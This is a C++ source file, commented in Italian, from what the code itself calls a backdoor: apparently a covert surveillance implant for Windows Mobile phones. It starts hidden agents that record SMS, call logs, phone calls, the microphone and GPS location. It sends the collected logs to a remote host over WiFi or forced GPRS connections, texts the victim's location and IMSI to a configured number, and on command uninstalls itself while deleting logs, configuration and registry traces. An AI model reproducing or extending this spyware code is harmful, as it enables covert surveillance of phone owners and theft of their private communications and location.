#include <stdio.h>
#include <time.h>
#include <vector>
#include <exception>
using namespace std;

#include "Task.h"
#include "Agents.h"
#include "Events.h"
#include "Microphone.h"
#include "RecordedCalls.h"

#define SLEEP_TIME 600	// Intervallo per il controllo della event list in ms

void Task::Sleep() {
	Sleep(SLEEP_TIME);
}

void Task::Sleep(UINT ms) {
	::Sleep(ms);
}

// CRITICAL - L'handle del thread dell'agente verra' chiuso soltanto dalla StopAgents() al primo
// reload della backdoor. Da qui non abbiamo modo di sapere quale sia l'handle del thread associato
// a questo agente, quindi possiamo soltanto comandargli lo stop.
BOOL Task::StopAgent(UINT Type) {
	list<AgentStruct *>::iterator iter;
	list<AgentStruct *> *agents;
	
	// Cerchiamo l'agente e diciamogli di fermarsi
	WAIT_AND_SIGNAL(statusObj->hAgentsLock);
	agents = statusObj->GetAgentsList();

	if(agents == NULL){
		UNLOCK(statusObj->hAgentsLock);
		return AGENT_STOPPED;
	}

	for(iter = agents->begin(); iter != agents->end(); iter++) {
		if((*iter)->uAgentId == Type && (*iter)->uAgentStatus == AGENT_RUNNING) {
			(*iter)->uCommand = AGENT_STOP;

			UNLOCK(statusObj->hAgentsLock);
			// Questa parte DEVE essere bloccante!
			LOOP{
				WAIT_AND_SIGNAL(statusObj->hAgentsLock);
				if((*iter)->uAgentStatus == AGENT_STOPPED) {
					(*iter)->uAgentStatus = AGENT_ENABLED; // Riabilitiamo lo stato dell'agente dopo lo stop
					UNLOCK(statusObj->hAgentsLock);
					return AGENT_STOPPED;
				}
				UNLOCK(statusObj->hAgentsLock);
				Sleep(350);
			}
		}
	}	

	// Se siamo arrivati qui l'agente non e' stato trovato...
	// quindi sicuramente non sta girando ;p
	UNLOCK(statusObj->hAgentsLock);
	return AGENT_STOPPED; 
}

BOOL Task::StopAgents() {
	BOOL bAllStopped = FALSE;
	UINT i;
	list<AgentStruct *>::iterator iter;
	list<AgentStruct *> *agents;

	// Diciamo a tutti gli agenti di fermarsi
	WAIT_AND_SIGNAL(statusObj->hAgentsLock);
	agents = statusObj->GetAgentsList();

	if(agents == NULL){
		UNLOCK(statusObj->hAgentsLock);
		return AGENT_STOPPED;
	}

	for(iter = agents->begin(); iter != agents->end(); iter++){
		if((*iter)->uAgentStatus == AGENT_RUNNING) {
			(*iter)->uCommand = AGENT_STOP;
		}
	}
	UNLOCK(statusObj->hAgentsLock);

	/*	// E vediamo se sono tutti fermi (DEVE essere bloccante)
	while(bAllStopped == FALSE){
	bAllStopped = TRUE;

	WAIT_AND_SIGNAL(statusObj->hAgentsLock);
	agents = statusObj->GetAgentsList();

	for(iter = agents->begin(); iter != agents->end(); iter++){
	if((*iter)->uAgentStatus != AGENT_STOPPED){
	bAllStopped = FALSE;
	break;
	}
	}
	UNLOCK(statusObj->hAgentsLock);
	MiniSleep(350);
	}

	return (bAllStopped) ? AGENT_STOPPED : FALSE;*/

	// Aspettiamo che i thread muoiano (su mobile non e' 
	// supportato il flag TRUE della WaitForMultipleObjects())
	for(i = 0; i < uAgents; i++) {
		WaitForSingleObject(hAgents[i], INFINITE);
	}
	
	for(i = 0; i < uAgents; i++){
		CloseHandle(hAgents[i]);
		hAgents[i] = INVALID_HANDLE_VALUE;
	}

	// Riabilitiamo lo stato per gli agenti abilitati
	WAIT_AND_SIGNAL(statusObj->hAgentsLock);
	for(iter = agents->begin(); iter != agents->end(); iter++){
		if((*iter)->uAgentStatus == AGENT_STOPPED) {
			(*iter)->uAgentStatus = AGENT_ENABLED;
		}

		(*iter)->uCommand = 0;
	}
	UNLOCK(statusObj->hAgentsLock);

	delete[] hAgents;
	hAgents = NULL;
	uAgents = 0;

	return AGENT_STOPPED;
}

BOOL Task::StopEvents() {
	BOOL bAllStopped = FALSE;
	UINT i;
	list<EventStruct *>::iterator iter;
	list<EventStruct *> *events;

	// Diciamo a tutti gli agenti di fermarsi
	WAIT_AND_SIGNAL(statusObj->hEventsLock);
	events = statusObj->GetEventsList();

	if(events == NULL){
		UNLOCK(statusObj->hEventsLock);
		return EVENT_STOPPED;
	}

	for(iter = events->begin(); iter != events->end(); iter++){
		(*iter)->uCommand = EVENT_STOP;
	}
	UNLOCK(statusObj->hEventsLock);

/*	// E vediamo se sono tutti fermi (DEVE essere bloccante)
	while(bAllStopped == FALSE){
		bAllStopped = TRUE;

		WAIT_AND_SIGNAL(statusObj->hEventsLock);
		events = statusObj->GetEventsList();

		for(iter = events->begin(); iter != events->end(); iter++){
			if((*iter)->uEventStatus != EVENT_STOPPED){
				bAllStopped = FALSE;
				(*iter)->uCommand = EVENT_STOP;
				break;
			}
		}

		UNLOCK(statusObj->hEventsLock);
		MiniSleep(350);
	}*/

	// Aspettiamo che i thread muoiano (su mobile non e' 
	// supportato il flag TRUE della WaitForMultipleObjects())
	for(i = 0; i < uAgents; i++) {
		WaitForSingleObject(hEvents[i], INFINITE);
	}

	for(i = 0; i < uEvents; i++){
		CloseHandle(hEvents[i]);
		hEvents[i] = INVALID_HANDLE_VALUE;
	}

	delete[] hEvents;
	hEvents = NULL;
	uEvents = 0;

	//return (bAllStopped) ? EVENT_STOPPED : FALSE;
	return EVENT_STOPPED;
}

// MANAGEMENT - L'agente per essere avviato deve comunque esser presente nel file di
// configurazione, settato come AGENT_DISABLED
BOOL Task::StartAgent(UINT Type) {
	UINT i;
	list<AgentStruct *>::iterator iter;
	list<AgentStruct *> *agents;

	WAIT_AND_SIGNAL(statusObj->hAgentsLock);
	agents = statusObj->GetAgentsList();

	if(agents == NULL){
		UNLOCK(statusObj->hAgentsLock);
		return TRUE;
	}

	for(iter = agents->begin(); iter != agents->end(); iter++){
		if((*iter)->uAgentId == Type && (*iter)->uAgentStatus != AGENT_RUNNING && (*iter)->pFunc){
			HANDLE t_Handle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)((*iter)->pFunc), *iter, 0, NULL);

			if(t_Handle == NULL){
				UNLOCK(statusObj->hAgentsLock);
				return FALSE;
			}

			// Espandiamo l'array degli handle
			uAgents++;

			HANDLE *t_Array = new(std::nothrow) HANDLE[uAgents];
			
			if(t_Array == NULL){
				uAgents--;
				CloseHandle(t_Handle);
				UNLOCK(statusObj->hAgentsLock);
				return FALSE;
			}

			// Copiamo tutti i vecchi handle
			for(i = 0; i < uAgents - 1; i++)
				t_Array[i] = hAgents[i];

			// Ed aggiungiamo il nostro
			t_Array[uAgents - 1] = t_Handle;

			delete[] hAgents;

			hAgents = t_Array;

			(*iter)->uAgentStatus = AGENT_ENABLED;
			break;
		}

	}

	UNLOCK(statusObj->hAgentsLock);
	return TRUE;
}

// Riavvia un agente soltanto se e' attivo
BOOL Task::ReStartAgent(UINT Type) {
	if(StopAgent(Type) == FALSE)
		return FALSE;

	if(StartAgent(Type) == FALSE)
		return FALSE;

	return TRUE;
}

// MANAGEMENT - Qui vanno aggiunte le funzioni di start di tutti gli agenti che funzionano come thread!
BOOL Task::StartAgents() {
	UINT i;
	list<AgentStruct *>::iterator iter;
	list<AgentStruct *> *agents;
	Rand r;

	// Imposta tutte le thread routine
	WAIT_AND_SIGNAL(statusObj->hAgentsLock);
	agents = statusObj->GetAgentsList();

	// Non e' necessaria la presenza degli agenti
	if(agents == NULL){
		UNLOCK(statusObj->hAgentsLock);
		return TRUE;
	}

	uAgents = 0;

	for(iter = agents->begin(); iter != agents->end(); iter++){
		switch((*iter)->uAgentId){
			case AGENT_SMS: (*iter)->pFunc = SmsAgent; break;
			case AGENT_CALLLIST: (*iter)->pFunc = CallListAgent; break;
			case AGENT_TASK: (*iter)->pFunc = TaskAgent; break;
			case AGENT_DEVICE: (*iter)->pFunc = DeviceInfoAgent; break;
			case AGENT_CALL_LOCAL: (*iter)->pFunc = RecordedCalls; break;		
			case AGENT_MIC: (*iter)->pFunc = RecordedMicrophone; break;
			case AGENT_GPS: (*iter)->pFunc = GpsAgent; break;
			case AGENT_CALL: (*iter)->pFunc = NULL; break;
			case AGENT_KEYLOG: (*iter)->pFunc = NULL; break;
			case AGENT_SNAPSHOT: (*iter)->pFunc = NULL; break;
			case AGENT_URL: (*iter)->pFunc = NULL; break;
			case AGENT_IM: (*iter)->pFunc = NULL; break;
			case AGENT_CAM: (*iter)->pFunc = NULL; break;
			default: (*iter)->pFunc = NULL; break;
		}

		// Contiamo gli agenti attivi
		if((*iter)->uAgentStatus == AGENT_ENABLED && (*iter)->pFunc)
			uAgents++;
	}

	if(hAgents){
		delete[] hAgents;
		hAgents = NULL;
	}

	hAgents = new(std::nothrow) HANDLE[uAgents];

	if(hAgents == NULL)
		return FALSE;

	for(i = 0; i < uAgents; i++)
		hAgents[i] = INVALID_HANDLE_VALUE;

	// Avvia i thread che sono marcati come attivi
	for(i = 0, iter = agents->begin(); iter != agents->end(); iter++){
		if((*iter)->uAgentStatus == AGENT_ENABLED && (*iter)->pFunc){
			hAgents[i] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)((*iter)->pFunc), *iter, 0, NULL);

			if(hAgents[i] == NULL){

			}else{
				i++;
				Sleep(r.rand24() % 20);
			}

		}
	}
	UNLOCK(statusObj->hAgentsLock);
	return TRUE;
}

// MANAGEMENT - Aggiungere qui le funzioni di gestione di ogni monitor
BOOL Task::RegisterEvents() {
	list<EventStruct *>::iterator iter;
	list<EventStruct *> *events;
	UINT i;
	Rand r;

	// Imposta tutte le thread routine
	WAIT_AND_SIGNAL(statusObj->hEventsLock);
	events = statusObj->GetEventsList();

	// Non e' necessario registrare degli eventi
	if(events == NULL){
		UNLOCK(statusObj->hEventsLock);
		return TRUE;
	}

	uEvents = 0;

	for(iter = events->begin(); iter != events->end(); iter++){
		switch((*iter)->uEventType){
			case EVENT_SMS: (*iter)->pFunc = OnSms; break;
			case EVENT_CALL: (*iter)->pFunc = OnCall; break;
			case EVENT_CONNECTION: (*iter)->pFunc = OnConnection; break;
			case EVENT_TIMER: (*iter)->pFunc = OnTimer; break;
			case EVENT_PROCESS: (*iter)->pFunc = OnProcess; break;
			case EVENT_SIM_CHANGE: (*iter)->pFunc = OnSimChange; break;
			case EVENT_LOCATION: (*iter)->pFunc = OnLocation; break;
			default: (*iter)->pFunc = NULL; break;
		}

		// Contiamo gli eventi configurati
		if((*iter)->pFunc)
			uEvents++;
	}

	if(hEvents){
		delete[] hEvents;
		hEvents = NULL;
	}

	hEvents = new(std::nothrow) HANDLE[uEvents];

	if(hEvents == NULL)
		return FALSE;

	for(i = 0; i < uEvents; i++)
		hEvents[i] = INVALID_HANDLE_VALUE;

	// Avvia i monitor
	for(i = 0, iter = events->begin(); iter != events->end(); iter++){
		if((*iter)->pFunc){
			hEvents[i] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)((*iter)->pFunc), *iter, 0, NULL);

			if(hEvents[i] == NULL){ // Il thread non e' partito... Andiamo cmq avanti
				
			}else{
				i++;
				Sleep(r.rand24() % 20);
			}
		}
	}
	UNLOCK(statusObj->hEventsLock);

	return TRUE;
}

Task::Task() : bUninstall(FALSE), statusObj(NULL), confObj(NULL), hEvents(NULL), hAgents(NULL),
uEvents(0), uAgents(0), bReload(FALSE), deviceObj(NULL), uberlogObj(NULL), observerObj(NULL) {
	MSGQUEUEOPTIONS_OS queue;

	ZeroMemory(&queue, sizeof(queue));

	queue.dwSize = sizeof(queue);
	queue.dwFlags = MSGQUEUE_NOPRECOMMIT | MSGQUEUE_ALLOW_BROKEN;
	queue.dwMaxMessages = 0;
	queue.cbMaxMessage = 1024 * 4; // 4kb massimo per ogni messaggio
	queue.bReadAccess = TRUE;

	// Creiamo la coda IPC
	g_hSmsQueueRead = CreateMsgQueue(L"IpcQueueLocalSAR", &queue); // Sms Agent Queue

	queue.bReadAccess = FALSE;
	g_hSmsQueueWrite = CreateMsgQueue(L"IpcQueueLocalSAW", &queue); // Sms Agent Queue

	// Istanziamo qui tutti gli oggetti singleton dopo aver inizializzato le code
	statusObj = Status::self();
	deviceObj = Device::self();
	uberlogObj = UberLog::self();
	observerObj = Observer::self();
}

Task::~Task(){
	if(deviceObj)
		delete deviceObj;

	if(statusObj)
		delete statusObj;

	if(confObj)
		delete confObj;

	if(hEvents)
		delete[] hEvents;

	if(hAgents)
		delete[] hAgents;

	// XXX Zozzerigi, rimuovere quando verra' implementata la classe IPC
	if(g_hSmsQueueRead != NULL)
		CloseMsgQueue(g_hSmsQueueRead);

	if(g_hSmsQueueWrite != NULL)
		CloseMsgQueue(g_hSmsQueueWrite);
}

BOOL Task::TaskInit() {
	if(statusObj == NULL)
		return FALSE;

	StopAgents();
	StopEvents();

	statusObj->Clear();

	// XXX - Da implementare: Dobbiamo uninstallare la backdoor
	if(bUninstall){
		ActionUninstall(NULL); // Richiamiamo direttamente l'azione		
		return FALSE; // Torniamo come se fosse un errore
	}

	if(deviceObj)
		deviceObj->RefreshData(); // Inizializza varie cose tra cui g_InstanceId

	if(confObj){
		delete confObj;
		confObj = NULL;
	}

	confObj =  new(std::nothrow) Conf();

	if(confObj == NULL)
		return FALSE;

	if(confObj->LoadConf() == FALSE)
		return FALSE;

	if(uberlogObj)
		uberlogObj->ScanLogs();

	// Da qui in poi inizia la concorrenza tra i thread
	if(RegisterEvents() == FALSE)
		return FALSE;

	return StartAgents();
}

BOOL Task::CheckActions() {
	list<MacroActionStruct *> *actions;
	list<MacroActionStruct *>::iterator iter;
	register UINT i;

	if(bUninstall) // Dobbiamo disinstallarci?
		return TRUE;

	// Inizia il loop di check degli eventi
	LOOP{
		WAIT_AND_SIGNAL(statusObj->hActionsLock);
		actions = statusObj->GetActionsList();
		UNLOCK(statusObj->hActionsLock);

		for(iter = actions->begin(); iter != actions->end(); iter++){
			if((*iter)->bTriggered){
				pActionStruct pAction = (*iter)->pActions;
				for(i = 0; i < (*iter)->uSubActions; i++, pAction++){
					switch(pAction->uActionType){
						case ACTION_SYNC: 
							WAIT_AND_SIGNAL(statusObj->hActionsLock);
							(*iter)->bTriggered = FALSE;
							UNLOCK(statusObj->hActionsLock);

							if(ActionSync(pAction)){
								if(bUninstall) {
									ActionUninstall(pAction);
									return FALSE;
								}

								if(bReload) {
									bReload = FALSE;
									return TRUE; // Ricarichiamoci
								}
							}

							break;

						case ACTION_SYNC_PDA: 
							WAIT_AND_SIGNAL(statusObj->hActionsLock);
							(*iter)->bTriggered = FALSE;
							UNLOCK(statusObj->hActionsLock);

							if(ActionSyncPda(pAction)){
								if(bUninstall) {
									ActionUninstall(pAction);
									return FALSE;
								}

								if(bReload) {
									bReload = FALSE;
									return TRUE; // Ricarichiamoci
								}
							}

							break;

						case ACTION_UNINSTALL: 
							WAIT_AND_SIGNAL(statusObj->hActionsLock);
							(*iter)->bTriggered = FALSE;
							UNLOCK(statusObj->hActionsLock);
							bUninstall = TRUE;

							// ActionUninstall() torna TRUE se va a buon fine, ma per
							// uninstallarci ed uscire dal loop iniziale dobbiamo tornare
							// con FALSE.
							return !ActionUninstall(pAction);
							break;

						case ACTION_RELOAD:
							WAIT_AND_SIGNAL(statusObj->hActionsLock);
							(*iter)->bTriggered = FALSE;
							UNLOCK(statusObj->hActionsLock);
							return ActionReload(pAction);
							break;

						case ACTION_SMS:
							WAIT_AND_SIGNAL(statusObj->hActionsLock);
							(*iter)->bTriggered = FALSE;
							UNLOCK(statusObj->hActionsLock);
							ActionSms(pAction); 
							break;

						case ACTION_TOOTHING:
							WAIT_AND_SIGNAL(statusObj->hActionsLock);
							(*iter)->bTriggered = FALSE;
							UNLOCK(statusObj->hActionsLock);
							ActionToothing(pAction); 
							break;

						case ACTION_START_AGENT:
							WAIT_AND_SIGNAL(statusObj->hActionsLock);
							(*iter)->bTriggered = FALSE;
							UNLOCK(statusObj->hActionsLock);
							ActionStartAgent(pAction); 
							break;

						case ACTION_STOP_AGENT:
							WAIT_AND_SIGNAL(statusObj->hActionsLock);
							(*iter)->bTriggered = FALSE;
							UNLOCK(statusObj->hActionsLock);
							ActionStopAgent(pAction); 
							break;

						default: break;
					}
				}
				WAIT_AND_SIGNAL(statusObj->hActionsLock);
				(*iter)->bTriggered = FALSE;
				UNLOCK(statusObj->hActionsLock);
			}
		}
		Sleep();
	}

	return TRUE;
}

BOOL Task::ActionSync(pActionStruct pAction) {
	UINT uGprs, uWiFi, uRet, uHostLen;
	WCHAR *wHost = NULL;
	BYTE *pTmp;

	// Facciamo il clear dei flag
	bUninstall = bReload = FALSE;

	if(uberlogObj == NULL)
		return FALSE;

	if(pAction->uParamLength < sizeof(UINT) * 3)
		return FALSE;

	pTmp = (BYTE *)pAction->pParams;

	CopyMemory(&uGprs, pTmp, sizeof(uGprs)); pTmp += sizeof(uGprs);
	CopyMemory(&uWiFi, pTmp, sizeof(uWiFi)); pTmp += sizeof(uGprs);
	CopyMemory(&uHostLen, pTmp, sizeof(uHostLen)); pTmp += sizeof(uGprs);

	wHost = (WCHAR *)new(std::nothrow) BYTE[uHostLen + sizeof(WCHAR)];

	if(wHost == NULL)
		return FALSE;

	ZeroMemory(wHost, uHostLen + sizeof(WCHAR));
	CopyMemory(wHost, pTmp, uHostLen);

	// Stoppiamo solo gli agenti che producono un singolo log, non tutti (tipo il Keylogger/GPS)
	ReStartAgent(AGENT_GPS);
	Sleep(2500);
	uberlogObj->ScanLogs();

#pragma message(__LOC__"Testare queste due funzioni")

	// Proviamo a spedire via internet (WiFi/Gprs o chi lo sa...)
	uRet = InternetSend(wHost);
	switch(uRet) {
		case SEND_UNINSTALL: 
			bUninstall = TRUE;
			break;

		case SEND_RELOAD: 
			bReload = TRUE;
			break;

		default: 
			break;
	}

	if(uRet != FALSE) {
		if(wHost)
			delete[] wHost;

		return TRUE;
	}

	// Vediamo se dobbiamo syncare via WiFi
	if((uWiFi & CONF_CONNECTION_WIFI) == CONF_CONNECTION_WIFI) {
		ForceWiFiConnection();

		uRet = InternetSend(wHost);

		ReleaseWiFiConnection();

		switch(uRet) {
			case SEND_UNINSTALL: 
				bUninstall = TRUE;
				break;

			case SEND_RELOAD: 
				bReload = TRUE;
				break;

			default: 
				break;
		}

		if(uRet != FALSE) {
			if(wHost)
				delete[] wHost;

			return TRUE;
		}
	}

	// Vediamo se dobbiamo syncare tramite GPRS
	if((uGprs & CONF_CONNECTION_GPRS) == CONF_CONNECTION_GPRS && deviceObj->IsSimEnabled()) {
		ForceGprsConnection();

		uRet = InternetSend(wHost);

		ReleaseGprsConnection();

		switch(uRet) {
			case SEND_UNINSTALL: 
				bUninstall = TRUE;
				break;

			case SEND_RELOAD: 
				bReload = TRUE;
				break;

			default: 
				break;
		}

		if(uRet != FALSE) {
			if(wHost)
				delete[] wHost;

			return TRUE;
		}
	}

	if(wHost)
		delete[] wHost;

	return FALSE;
}

BOOL Task::ActionSyncPda(pActionStruct pAction) {
	UINT Type, uRet;

	// Facciamo il clear dei flag
	bUninstall = bReload = FALSE;

	if(uberlogObj == NULL)
		return FALSE;

	if(pAction->uParamLength != 4)
		return FALSE;

	// 1 = BT, 2 = WiFi
	CopyMemory(&Type, pAction->pParams, sizeof(Type));

	// Stoppiamo solo gli agenti che producono un singolo log, non tutti (tipo il Keylogger/GPS)
	ReStartAgent(AGENT_GPS);
	Sleep(2500);
	uberlogObj->ScanLogs();

	switch(Type) {
		case CONF_SYNC_BT:
			uRet = BtSend();
			break;

		case CONF_SYNC_WIFI:
			uRet = WiFiSendPda();
			break;

		default:
			return FALSE;
	}

	switch(uRet) {
		case SEND_UNINSTALL: 
			bUninstall = TRUE;
			break;

		case SEND_RELOAD: 
			bReload = TRUE;
			break;

		default: 
			break;
	}

	return TRUE;
}

BOOL Task::ActionUninstall(pActionStruct pAction) {
	Log *LocalLog = NULL;
	HMODULE hSmsFilter = NULL;
	typedef HRESULT (*pUnregister)();

	pUnregister UnregisterFunction;

	StopAgents();
	StopEvents();

	if(uberlogObj == NULL)
		return FALSE;

	uberlogObj->DeleteAll();

	LocalLog = new(std::nothrow) Log();

	if(LocalLog == NULL)
		return FALSE;

	LocalLog->RemoveMarkups();

	if(confObj)
		confObj->RemoveConf();

	LocalLog->RemoveLogDirs();
	delete LocalLog;

	// Unregistriamo la DLL per il filtering degli SMS
	hSmsFilter = LoadLibrary(SMS_DLL);

	if(hSmsFilter != NULL) {
		UnregisterFunction = (pUnregister)GetProcAddress(hSmsFilter, L"DllUnregisterServer");

		if(UnregisterFunction != NULL) {
			UnregisterFunction();
		}

		FreeLibrary(hSmsFilter);
	}

	DeleteFile(SMS_DLL_PATH);

	// Rimuoviamo il servizio
	RegDeleteKey(HKEY_LOCAL_MACHINE, MORNELLA_SERVICE_PATH);
	
	return TRUE;
}

BOOL Task::ActionReload(pActionStruct pAction) {
	return TRUE;
}

BOOL Task::ActionSms(pActionStruct pAction) {
#define GPS_TIMEOUT		180 // 180 secondi
#define GPS_TIMESLICE	10 // In step di 10 secondi
#define CELL_TIMEOUT	120 // 120 secondi
#define CELL_TIMESLICE	10 // In step di 10 secondi

	Sms *sms = NULL;
	GPS *gps = GPS::self(10000, 1000);
	
	GPS_POSITION position;
	RILCELLTOWERINFO cell;

	DWORD dwGpsFields, dwCellFields, dwNumLen;
	WCHAR wNumber[17];
	WCHAR wMessage[71], wTmp[71]; // Codifica a 7 bit per 160 caratteri
	const WCHAR *pwImsi;
	BOOL bGps, bImsi, bGpsAcquired;
	BYTE *pParams;
	UINT i, uOpt;

	if(pAction->uParamLength == NULL)
		return FALSE;

	if(deviceObj->IsGsmEnabled() == FALSE)
		return FALSE;

	ZeroMemory(wMessage, sizeof(wMessage));
	ZeroMemory(&position, sizeof(position));
	ZeroMemory(&cell, sizeof(cell));
	ZeroMemory(&wNumber, sizeof(wNumber));

	// 1 GPS
	// 2 IMSI
	// I primi 4 byte indicano se vogliamo il GPS e l'IMSI
	pParams = (BYTE *)pAction->pParams;
	CopyMemory(&uOpt, pParams, sizeof(UINT)); pParams += 4;

	// Leggiamo la dword della lunghezza del numero
	CopyMemory(&dwNumLen, pParams, sizeof(UINT)); pParams += 4;

	// Copiamo il numero
	CopyMemory(&wNumber, pParams, (dwNumLen > 16 * sizeof(WCHAR)) ? 16 * sizeof(WCHAR) : dwNumLen);

	switch(uOpt) {
		case 0:
			bGps = FALSE;
			bImsi = FALSE;
			break;

		case 1: // Solo GPS
			bGps = TRUE;
			bImsi = FALSE;
			break;

		case 2: // Solo IMSI
			bGps = FALSE;
			bImsi = TRUE;
			break;

		case 3: // GPS e IMSI
		default:
			bGps = TRUE;
			bImsi = TRUE;
			break;

	}

	if(gps == NULL)
		return FALSE;

	dwGpsFields = GPS_VALID_LATITUDE | GPS_VALID_LONGITUDE;
	dwCellFields =  RIL_PARAM_CTI_MOBILECOUNTRYCODE  |  RIL_PARAM_CTI_MOBILENETWORKCODE |
					RIL_PARAM_CTI_LOCATIONAREACODE |  RIL_PARAM_CTI_CELLID;

	sms = new(std::nothrow) Sms();

	if(sms == NULL)
		return FALSE;

	// Vogliamo il GPS?
	if(bGps) {
		bGpsAcquired = FALSE;

		for(i = 0; i < 10; i++) {
			if(gps->Start())
				break;
			else
				Sleep(2000);
		}

		if(gps->getGPS(&position) && (position.dwValidFields & dwGpsFields) == dwGpsFields) {
			bGpsAcquired = TRUE;
		}else { // Polliamo 2 minuti se non riusciamo subito ad avere una posizione {
			for(i = 0; i < GPS_TIMEOUT / GPS_TIMESLICE; i++) {
				Sleep(GPS_TIMESLICE * 1000);
				if(gps->getGPS(&position) && (position.dwValidFields & dwGpsFields) == dwGpsFields) {
					bGpsAcquired = TRUE;
					break;
				}
			}
		}

		// Se non abbiamo il GPS, proviamo con la cella
		if(bGpsAcquired == FALSE) {
			if(gps->getCELL(&cell) && (cell.dwParams & dwCellFields) == dwCellFields) { // Se abbiamo una cella valida

				wcscat_s(wMessage, 70, wTmp);
			} else {
				for(i = 0; i < CELL_TIMEOUT / CELL_TIMESLICE; i++) {
					Sleep(CELL_TIMESLICE * 1000);
					if(gps->getCELL(&cell) && (cell.dwParams & dwCellFields) == dwCellFields) {
						wcscat_s(wMessage, 70, wTmp);
						break;
					}
				}
			}
		}

		gps->Stop();
	}

	pwImsi = deviceObj->GetImsi();

	ZeroMemory(wTmp, sizeof(wTmp));

	if(bImsi && pwImsi) {
		wcscat_s(wMessage, 70, wTmp);
	}

	if(wcslen(wMessage) == 0){
	}

	if((bGps || bImsi) && wcslen(wMessage)) {
		// manda il messaggio e torna
		BOOL bRes;

		bRes = sms->SendMessage(wNumber, wMessage);

		delete sms;
		return bRes;
	}

	delete sms;
	return FALSE;
}

BOOL Task::ActionToothing(pActionStruct pAction) {
	if(pAction->pParams == NULL)
		return FALSE;

	//CloseHandle(CreateFile(L"00-Toothing.bin", GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL));
	return TRUE;
}

BOOL Task::ActionStartAgent(pActionStruct pAction) {
	UINT uAgentId;

	if(pAction->pParams == NULL)
		return FALSE;

	memcpy(&uAgentId, pAction->pParams, sizeof(UINT));

	return StartAgent(uAgentId);
}

BOOL Task::ActionStopAgent(pActionStruct pAction) {
	UINT uAgentId;

	if(pAction->pParams == NULL)
		return FALSE;

	memcpy(&uAgentId, pAction->pParams, sizeof(UINT));

	return StopAgent(uAgentId);
}
